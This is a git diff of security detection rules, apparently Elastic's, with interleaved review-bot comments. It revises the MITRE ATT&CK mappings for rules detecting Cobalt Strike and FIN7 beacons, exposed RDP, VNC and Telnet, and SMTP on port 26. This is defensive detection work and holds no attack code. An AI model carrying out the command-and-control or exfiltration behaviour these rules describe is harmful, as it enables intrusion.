@@ -168,3 +168,21 @@ tags = [ "Resources: Investigation Guide", ] type = "machine_learning" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" +[[rule.threat.technique.subtechnique]] +id = "T1543.003" +name = "Windows Service" +reference = "https://attack.mitre.org/techniques/T1543/003/" + + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/ml/persistence_ml_windows_anomalous_path_activity.toml b/rules/ml/persistence_ml_windows_anomalous_path_activity.toml index 3ada406bbf5..ce8453a6836 100644 --- a/rules/ml/persistence_ml_windows_anomalous_path_activity.toml +++ b/rules/ml/persistence_ml_windows_anomalous_path_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] anomaly_threshold = 50 
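Review bot: The appended threat block in persistence_ml_rare_process_by_host_windows.toml follows `type = "machine_learning"` with no separating blank line, has none between the `framework`, technique and sub-technique stanzas, and three before `[rule.threat.tactic]`; the rest of this directory separates each TOML stanza with exactly one blank line. T1543.003 Windows Service under Persistence is a sound choice for a Windows persistence rule, but the `tags` line is outside this hunk — confirm it already carries `"Tactic: Persistence"`.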
@@ -108,22 +108,49 @@ The Windows integration allows you to monitor the Windows OS, services, applicat - For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/windows). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Execution", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Persistence", + "Tactic: Execution", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" +[[rule.threat.technique.subtechnique]] +id = "T1543.003" +name = "Windows Service" +reference = "https://attack.mitre.org/techniques/T1543/003/" + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1204" name = "User Execution" reference = "https://attack.mitre.org/techniques/T1204/" - [[rule.threat.technique.subtechnique]] id = "T1204.002" name = "Malicious File" reference = "https://attack.mitre.org/techniques/T1204/002/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/ml/persistence_ml_windows_anomalous_process_all_hosts.toml b/rules/ml/persistence_ml_windows_anomalous_process_all_hosts.toml index 250fbaa439f..f9ada397b67 100644 --- a/rules/ml/persistence_ml_windows_anomalous_process_all_hosts.toml +++ b/rules/ml/persistence_ml_windows_anomalous_process_all_hosts.toml 
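Review bot: The new Persistence stanza asserts T1543.003 Windows Service for a rule that flags a process running from an unusual *path*; path rarity alone does not evidence service creation or modification, so this mapping should be justified in the investigation guide or replaced with a technique the signal supports (Defense Evasion / T1036 Masquerading is the usual fit for off-path binaries, if that matches the rule's intent). The `tags` change does keep tags and tactics in sync by adding `"Tactic: Persistence"` next to `"Tactic: Execution"`. The stanzas are missing blank separators between `framework`, technique and sub-technique, and have two blank lines before each `[rule.threat.tactic]`, unlike the other rules in this patch.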
@@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [transform] [[transform.osquery]] @@ -169,3 +169,33 @@ tags = [ "Resources: Investigation Guide", ] type = "machine_learning" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/ml/persistence_ml_windows_anomalous_process_creation.toml b/rules/ml/persistence_ml_windows_anomalous_process_creation.toml index bf041396252..f498ba198b9 100644 --- a/rules/ml/persistence_ml_windows_anomalous_process_creation.toml +++ b/rules/ml/persistence_ml_windows_anomalous_process_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [transform] [[transform.osquery]] 
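Review bot: The Persistence mapping added here stops at the parent T1543, whereas the sibling Windows rules in this patch specify `T1543.003` / `Windows Service`; use the same level of precision or explain why the parent-only mapping is intended. Style: the appended block has no blank line after `type = "machine_learning"`, none between the `framework`, technique and tactic stanzas, and two or three in a row before each `[rule.threat.tactic]`, where the directory convention is one blank line between stanzas. The rule's `tags` line is outside the hunk; it needs `"Tactic: Persistence"` and `"Tactic: Execution"` to match the two tactics added.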
@@ -161,27 +161,26 @@ The Windows integration allows you to monitor the Windows OS, services, applicat - For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/windows). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Execution", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Persistence", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" - -[[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/ml/privilege_escalation_ml_linux_anomalous_sudo_activity.toml b/rules/ml/privilege_escalation_ml_linux_anomalous_sudo_activity.toml index b76ecf594fd..c41b0d62e61 100644 --- a/rules/ml/privilege_escalation_ml_linux_anomalous_sudo_activity.toml +++ b/rules/ml/privilege_escalation_ml_linux_anomalous_sudo_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/03" integration = ["auditd_manager", "endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] anomaly_threshold = 75 
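Review bot: The hunk swaps Execution (T1059 Command and Scripting Interpreter, T1204 / T1204.002 User Execution) for Persistence / T1543 without a sub-technique and changes the tag to match; an anomalous process-creation event is primarily an Execution signal, so the removed techniques were the more direct mapping, and parent-only T1543 is less precise than the T1543.003 used by the sibling Windows rules in this patch. Keep an Execution stanza alongside Persistence — several rules in this patch carry more than one tactic — or explain the narrowing in the commit message. The lone `+` before the next file header also adds a trailing blank line at end of file.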
@@ -122,18 +122,26 @@ Sudo is a command in Unix-like systems that allows permitted users to execute co - Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected.""" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" -[[rule.threat.technique.subtechnique]] -id = "T1548.003" -name = "Sudo and Sudo Caching" -reference = "https://attack.mitre.org/techniques/T1548/003/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/ml/privilege_escalation_ml_windows_rare_user_runas_event.toml b/rules/ml/privilege_escalation_ml_windows_rare_user_runas_event.toml index 454ceb65ca1..8485f372dbb 100644 --- a/rules/ml/privilege_escalation_ml_windows_rare_user_runas_event.toml +++ b/rules/ml/privilege_escalation_ml_windows_rare_user_runas_event.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] anomaly_threshold = 50 
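Review bot: The sub-technique T1548.003 "Sudo and Sudo Caching" is removed from a rule specifically about sudo activity, leaving the generic T1548 twice — once under the new Defense Evasion entry and once under Privilege Escalation; the sub-technique is the precise match and should stay on at least one of them. The new TA0005 entry also needs a matching `"Tactic: Defense Evasion"` tag, and the `tags` line of this file is outside the hunk, so confirm it is updated. The new `[rule.threat.tactic]` table is placed directly after `reference` with no separating blank line, unlike the rest of the file.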
@@ -119,22 +119,8 @@ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" - -[[rule.threat.technique.subtechnique]] -id = "T1548.004" -name = "Elevated Execution with Prompt" -reference = "https://attack.mitre.org/techniques/T1548/004/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/ml/resource_development_ml_linux_anomalous_compiler_activity.toml b/rules/ml/resource_development_ml_linux_anomalous_compiler_activity.toml index 3b0275cb450..8c04edd604d 100644 --- a/rules/ml/resource_development_ml_linux_anomalous_compiler_activity.toml +++ b/rules/ml/resource_development_ml_linux_anomalous_compiler_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/03" integration = ["auditd_manager", "endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] anomaly_threshold = 50 
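Review bot: After this hunk the `[[rule.threat]]` entry holds only `[rule.threat.tactic]` with no `[[rule.threat.technique]]`, so the rule no longer maps to any ATT&CK technique; T1548.004 "Elevated Execution with Prompt" was the direct match for a runas event and T1078 "Valid Accounts" its natural companion. Tactic-only entries also appear in the telnet, NAT-traversal and RDP-from-the-internet rules later in this patch; if tactic-only mappings are deliberately allowed, the PR description should say so, otherwise each needs a technique restored.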
@@ -121,3 +121,21 @@ Compilers transform source code into executable programs, a crucial step in soft - Restore the system from a known good backup if malicious code execution is confirmed, ensuring that the backup is free from compromise. - Implement stricter access controls and monitoring for compiler usage, ensuring only authorized users can execute compilers. - Escalate the incident to the security operations center (SOC) or incident response team for further analysis and to determine if additional systems are affected.""" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1588" +name = "Obtain Capabilities" +reference = "https://attack.mitre.org/techniques/T1588/" +[[rule.threat.technique.subtechnique]] +id = "T1588.001" +name = "Malware" +reference = "https://attack.mitre.org/techniques/T1588/001/" + + + +[rule.threat.tactic] +id = "TA0042" +name = "Resource Development" +reference = "https://attack.mitre.org/tactics/TA0042/" + diff --git a/rules/network/command_and_control_accepted_default_telnet_port_connection.toml b/rules/network/command_and_control_accepted_default_telnet_port_connection.toml index 284a87291a3..e586f7519a8 100644 --- a/rules/network/command_and_control_accepted_default_telnet_port_connection.toml +++ b/rules/network/command_and_control_accepted_default_telnet_port_connection.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw", "fortinet_fortigate", "sonicwall_firewall", "suricata"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/18" [rule] author = ["Elastic"] 
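Review bot: T1588 "Obtain Capabilities" describes acquiring tooling from outside parties, whereas compiling on a monitored host is closer to T1587 "Develop Capabilities" (whose `.001` sub-technique is also "Malware"); verify the intended technique against the framework before this mapping ships. The three empty lines between the sub-technique and `[rule.threat.tactic]`, and the empty line at end of file, should be collapsed to the single-blank-line layout used elsewhere in the rules tree.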
@@ -73,7 +73,18 @@ Telnet, a protocol for remote command-line access, is often used in legacy syste risk_score = 47 rule_id = "34fde489-94b0-4500-a76f-b8a157cf9269" severity = "medium" -tags = ["Domain: Endpoint", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Lateral Movement", "Data Source: PAN-OS", "Data Source: Fortinet", "Data Source: SonicWall", "Data Source: Suricata", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Tactic: Lateral Movement", + "Tactic: Initial Access", + "Data Source: PAN-OS", + "Data Source: Fortinet", + "Data Source: SonicWall", + "Data Source: Suricata", + "Resources: Investigation Guide", +] timeline_id = "300afc76-072d-4261-864d-4149714bf3f1" timeline_title = "Comprehensive Network Timeline" timestamp_override = "event.ingested" @@ -93,25 +104,32 @@ query = ''' [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1133" -name = "External Remote Services" -reference = "https://attack.mitre.org/techniques/T1133/" - [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + 
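Review bot: In the `@@ -93,25 +104,32 @@` hunk T1133 "External Remote Services" is replaced by T1190 "Exploit Public-Facing Application" for an accepted Telnet connection on the default port; Telnet is an exposed remote-access service, not a web application being exploited, so T1133 is the closer fit and T1190 overstates what the rule observes. The same T1133-to-T1190 substitution recurs in the RDP, VNC, RPC and SMB rules later in this patch. The new TA0011 Command and Control entry is also tactic-only, with no `[[rule.threat.technique]]`.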
diff --git a/rules/network/command_and_control_cobalt_strike_beacon.toml b/rules/network/command_and_control_cobalt_strike_beacon.toml index 025c8ebf198..c5d168d66d3 100644 --- a/rules/network/command_and_control_cobalt_strike_beacon.toml +++ b/rules/network/command_and_control_cobalt_strike_beacon.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/06" integration = ["network_traffic"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -82,28 +82,24 @@ query = ''' [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" -[[rule.threat.technique.subtechnique]] -id = "T1071.001" -name = "Web Protocols" -reference = "https://attack.mitre.org/techniques/T1071/001/" - [[rule.threat.technique]] id = "T1568" name = "Dynamic Resolution" reference = "https://attack.mitre.org/techniques/T1568/" - [[rule.threat.technique.subtechnique]] id = "T1568.002" name = "Domain Generation Algorithms" reference = "https://attack.mitre.org/techniques/T1568/002/" + + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + diff --git a/rules/network/command_and_control_cobalt_strike_default_teamserver_cert.toml b/rules/network/command_and_control_cobalt_strike_default_teamserver_cert.toml index 5afb949f418..3e98f2fdb7b 100644 --- a/rules/network/command_and_control_cobalt_strike_default_teamserver_cert.toml +++ b/rules/network/command_and_control_cobalt_strike_default_teamserver_cert.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/05" integration = ["network_traffic"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/04/22" [rule] author = ["Elastic"] 
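Review bot: The sub-technique T1071.001 "Web Protocols" is dropped while the parent T1071 "Application Layer Protocol" stays; for a beacon rule the sub-technique is the more precise mapping, and nothing in the hunk explains the removal. The same sub-technique removal appears in the FIN7 C2 rule, and the HALFBAKED rule swaps it for T1568.002 "Domain Generation Algorithms", so the three should be reviewed together. The blank lines between `[[rule.threat.technique]]` tables are removed here and two empty lines inserted before `[rule.threat.tactic]`, plus one at end of file, which departs from the layout of the surrounding files.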
@@ -87,28 +87,19 @@ query = ''' [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" - [[rule.threat.technique.subtechnique]] id = "T1071.001" name = "Web Protocols" reference = "https://attack.mitre.org/techniques/T1071/001/" -[[rule.threat.technique]] -id = "T1573" -name = "Encrypted Channel" -reference = "https://attack.mitre.org/techniques/T1573/" -[[rule.threat.technique.subtechnique]] -id = "T1573.002" -name = "Asymmetric Cryptography" -reference = "https://attack.mitre.org/techniques/T1573/002/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + diff --git a/rules/network/command_and_control_fin7_c2_behavior.toml b/rules/network/command_and_control_fin7_c2_behavior.toml index 8a8e20de3b8..038ab832275 100644 --- a/rules/network/command_and_control_fin7_c2_behavior.toml +++ b/rules/network/command_and_control_fin7_c2_behavior.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/06" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] 
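Review bot: T1573 "Encrypted Channel" and its sub-technique T1573.002 "Asymmetric Cryptography" are removed from a rule that triggers on a default team-server TLS certificate, leaving only T1071/T1071.001; the certificate-based detection is exactly the encrypted-channel behaviour, so that mapping should stay. The trailing empty line added at end of file should be dropped.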
@@ -43,28 +43,24 @@ destination.domain:/[a-zA-Z]{4,5}\.(pw|us|club|info|site|top)/ AND NOT destinati [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" -[[rule.threat.technique.subtechnique]] -id = "T1071.001" -name = "Web Protocols" -reference = "https://attack.mitre.org/techniques/T1071/001/" - [[rule.threat.technique]] id = "T1568" name = "Dynamic Resolution" reference = "https://attack.mitre.org/techniques/T1568/" - [[rule.threat.technique.subtechnique]] id = "T1568.002" name = "Domain Generation Algorithms" reference = "https://attack.mitre.org/techniques/T1568/002/" + + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + diff --git a/rules/network/command_and_control_halfbaked_beacon.toml b/rules/network/command_and_control_halfbaked_beacon.toml index 929355c8b37..1330bc27526 100644 --- a/rules/network/command_and_control_halfbaked_beacon.toml +++ b/rules/network/command_and_control_halfbaked_beacon.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/06" integration = ["network_traffic"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] 
@@ -80,18 +80,24 @@ query = ''' [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique]] +id = "T1568" +name = "Dynamic Resolution" +reference = "https://attack.mitre.org/techniques/T1568/" [[rule.threat.technique.subtechnique]] -id = "T1071.001" -name = "Web Protocols" -reference = "https://attack.mitre.org/techniques/T1071/001/" +id = "T1568.002" +name = "Domain Generation Algorithms" +reference = "https://attack.mitre.org/techniques/T1568/002/" + + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + diff --git a/rules/network/command_and_control_nat_traversal_port_activity.toml b/rules/network/command_and_control_nat_traversal_port_activity.toml index 8a8f0d1a7d7..e70052c7f23 100644 --- a/rules/network/command_and_control_nat_traversal_port_activity.toml +++ b/rules/network/command_and_control_nat_traversal_port_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -75,12 +75,8 @@ IPSEC NAT Traversal facilitates secure VPN communication across NAT devices by e [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1572" -name = "Protocol Tunneling" -reference = "https://attack.mitre.org/techniques/T1572/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + diff --git a/rules/network/command_and_control_port_26_activity.toml b/rules/network/command_and_control_port_26_activity.toml index 68fd2ce302f..2f266661300 100644 --- a/rules/network/command_and_control_port_26_activity.toml +++ b/rules/network/command_and_control_port_26_activity.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -75,22 +75,20 @@ SMTP, typically operating on port 25, is crucial for email transmission. However [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" - -[[rule.threat.technique.subtechnique]] -id = "T1071.003" -name = "Mail Protocols" -reference = "https://attack.mitre.org/techniques/T1071/003/" - -[[rule.threat.technique]] -id = "T1571" -name = "Non-Standard Port" -reference = "https://attack.mitre.org/techniques/T1571/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1048" +name = "Exfiltration Over Alternative Protocol" +reference = "https://attack.mitre.org/techniques/T1048/" + + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + diff --git a/rules/network/command_and_control_rdp_remote_desktop_protocol_from_the_internet.toml b/rules/network/command_and_control_rdp_remote_desktop_protocol_from_the_internet.toml index 543c85bbf79..1c67c535c25 100644 --- a/rules/network/command_and_control_rdp_remote_desktop_protocol_from_the_internet.toml +++ b/rules/network/command_and_control_rdp_remote_desktop_protocol_from_the_internet.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] 
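Review bot: In the `@@ -75,22 +75,20 @@` hunk T1571 "Non-Standard Port" is removed from a rule whose entire premise is SMTP on port 26 rather than 25, and T1071/T1071.003 "Mail Protocols" with it, so the Command and Control entry is left tactic-only; T1571 is the direct match and should be kept. The new Exfiltration entry with T1048 is reasonable for outbound mail on an unusual port, but the `tags` line of this file is outside the hunk, so confirm it gains a matching `"Tactic: Exfiltration"` tag.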
@@ -31,7 +31,7 @@ references = ["https://www.iana.org/assignments/iana-ipv4-special-registry/iana- risk_score = 47 rule_id = "8c1bdde8-4204-45c0-9e0c-c85ca3902488" severity = "medium" -tags = ["Domain: Endpoint", "Use Case: Threat Detection", "Tactic: Initial Access", "Data Source: PAN-OS", "Resources: Investigation Guide"] +tags = ["Tactic: Command and Control", "Domain: Endpoint", "Use Case: Threat Detection", "Data Source: PAN-OS", "Resources: Investigation Guide"] timeline_id = "300afc76-072d-4261-864d-4149714bf3f1" timeline_title = "Comprehensive Network Timeline" timestamp_override = "event.ingested" @@ -113,12 +113,32 @@ RDP allows administrators to remotely manage systems, but exposing it to the int [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1133" -name = "External Remote Services" -reference = "https://attack.mitre.org/techniques/T1133/" +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/network/command_and_control_vnc_virtual_network_computing_from_the_internet.toml b/rules/network/command_and_control_vnc_virtual_network_computing_from_the_internet.toml index d484d333516..bdb7850821e 100644 --- a/rules/network/command_and_control_vnc_virtual_network_computing_from_the_internet.toml 
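Review bot: The `@@ -31,7 +31,7 @@` hunk leaves `"Tactic: Command and Control"` as the only tactic tag, while the `@@ -113,12 +113,32 @@` hunk keeps Lateral Movement (TA0008) and Initial Access (TA0001) in `rule.threat`; the tags must also carry `"Tactic: Lateral Movement"` and `"Tactic: Initial Access"`, otherwise tags and threat disagree. The same tag/threat mismatch appears in the VNC-from-the-internet and SMB-to-the-internet rules later in this patch. The new tag is also placed before `"Domain: Endpoint"`, whereas the other rules in this patch keep `Domain:`/`Use Case:` first and tactic tags after; keep the established order. The added TA0011 entry has no `[[rule.threat.technique]]`.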
+++ b/rules/network/command_and_control_vnc_virtual_network_computing_from_the_internet.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/05/05" [rule] author = ["Elastic"] @@ -29,7 +29,7 @@ references = ["https://www.iana.org/assignments/iana-ipv4-special-registry/iana- risk_score = 73 rule_id = "5700cb81-df44-46aa-a5d7-337798f53eb8" severity = "high" -tags = ["Domain: Endpoint", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Persistence", "Data Source: PAN-OS", "Resources: Investigation Guide"] +tags = ["Tactic: Command and Control", "Domain: Endpoint", "Use Case: Threat Detection", "Data Source: PAN-OS", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -108,26 +108,26 @@ VNC allows remote control of systems, facilitating maintenance and resource shar [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1133" -name = "External Remote Services" -reference = "https://attack.mitre.org/techniques/T1133/" +id = "T1219" +name = "Remote Access Tools" +reference = "https://attack.mitre.org/techniques/T1219/" -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1133" -name = "External Remote Services" -reference = "https://attack.mitre.org/techniques/T1133/" +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + 
diff --git a/rules/network/command_and_control_vnc_virtual_network_computing_to_the_internet.toml b/rules/network/command_and_control_vnc_virtual_network_computing_to_the_internet.toml index da5ce08b9b3..99c927ca904 100644 --- a/rules/network/command_and_control_vnc_virtual_network_computing_to_the_internet.toml +++ b/rules/network/command_and_control_vnc_virtual_network_computing_to_the_internet.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/05/05" [rule] author = ["Elastic"] @@ -109,18 +109,14 @@ VNC is a tool that allows remote control of computers, often used by administrat [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1219" name = "Remote Access Tools" reference = "https://attack.mitre.org/techniques/T1219/" -[[rule.threat.technique.subtechnique]] -id = "T1219.003" -name = "Remote Access Hardware" -reference = "https://attack.mitre.org/techniques/T1219/003/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + diff --git a/rules/network/discovery_potential_network_sweep_detected.toml b/rules/network/discovery_potential_network_sweep_detected.toml index e466d21230d..0659815cbd5 100644 --- a/rules/network/discovery_potential_network_sweep_detected.toml +++ b/rules/network/discovery_potential_network_sweep_detected.toml @@ -2,7 +2,7 @@ creation_date = "2023/05/17" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/24" [rule] author = ["Elastic"] 
